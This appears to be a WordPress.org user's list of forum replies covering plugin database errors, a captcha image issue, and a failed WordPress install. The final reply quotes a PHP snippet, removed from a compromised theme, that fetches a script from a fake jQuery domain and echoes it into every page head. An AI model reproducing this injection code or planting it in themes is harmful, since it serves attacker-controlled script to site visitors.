PeggyMe
Forum Replies Created
-
Your welcome! Thank You! As for me, I was using an old version of the Plug-in and I had just assumed that the “readonly” column was something new. The old version that I was using did not seem to need it.
Your welcome. As for me,I was using a very old version of the Plug-in…I just assumed that the field “readonly” was new. The other version did not seem to need it.
Wow did not expect you to answer so quickly. So I did some digging myself. Yes the “readonly” column in the database did not exist. (I figured this out by installing the Participants Database plugin on another site and comparing the databases)
I put the readonly column into the database and it all seems to work great! Thanks sooo much.Hope this also works for shokydada
I am having the same problem. I am using PHP version 5.3.3. Just installed the latest version of WordPress but I’m pretty sure that is not the problem. Because the plug-in worked after I had updated WordPress, but does not work now that I have updated the plug-in.
The plugin is used on pages that are password protected, but I took the short code [pdb_record] off the page that it is usually on and put it on a page that was not password protected so you could look at it.
Here is the link to that page.
https://www.appfa.org/test-dates/?pid=CD3KJThe page with the single record on it looks the same as this page. It only shows the h3 headers.
I would appreciate your taking a look. In the mean time, I will try to figure out how to find the php error logs.
Forum: Plugins
In reply to: [Contact Form 7] image disapears after submitingthe site is still in development,here is the url
https://site.recordsearch.com.previewdns.com/contact/
…thanks!Forum: Plugins
In reply to: [Contact Form 7] image disapears after submitingMy bad I should have posted this on the Really Simple Captcha forum…so I guess I’ll post it both places.
Forum: Installing WordPress
In reply to: install did not add tables to the databaseThank You!! I have WordPress running now.
Forum: Installing WordPress
In reply to: install did not add tables to the databaseSo here is a weird glitch. I received an email from the company that hosts the site/database, … bottom line is yes WordPress was installed using that database back in 2008. The thing is I can not see any of the tables when I look at the database. So apparently there is something going on with the database.
I assume that when I get the database working properly, and delete all of the tables in the database, then I can start over and it will work correctly. Thank you for your help and your patience.Forum: Installing WordPress
In reply to: install did not add tables to the databaseI am using PHP Version 5.3.0
I am not sure how to check the version of MySQL I am using. The top of the database says:Welcome to phpMyAdmin 2.6.2-rc1
MySQL 5.1.39-community running o….Yes WP told me that the database needed upgrading and I clicked on the link it provided. Thinking about it though, I’m pretty sure that the WP script would not have permission to do this…
Forum: Installing WordPress
In reply to: install did not add tables to the databaseThe database was empty,and it still is empty. I sent a email to the company where the database is hosted to see if maybe there is some sort of permissions on the database…never heard of permissions on a database, but I thought it was worth a try.
Forum: Installing WordPress
In reply to: install did not add tables to the databaseOOPS … I meant the upgrade Database button. No it is not my server.
Forum: Installing WordPress
In reply to: Put WordPress in root without index.php fileOK Thank You for your time!!!
Forum: Installing WordPress
In reply to: Put WordPress in root without index.php fileNo I am not planning on replacing the old CMS later. I was pretty sure that I could not do what I wanted to do. I just thought I might see if anyone out there had a way of doing what I want to do.
Forum: Fixing WordPress
In reply to: Unwanted Jquery (jquerys) scriptI looked at the source code to your site. I do not see the unwanted jquerys.org code. You must have fixed it?
Forum: Fixing WordPress
In reply to: Unwanted Jquery (jquerys) scriptthe code I had to remove was close to the code you found, but just a little bit different.
Here is the code that I removedif (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="https://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}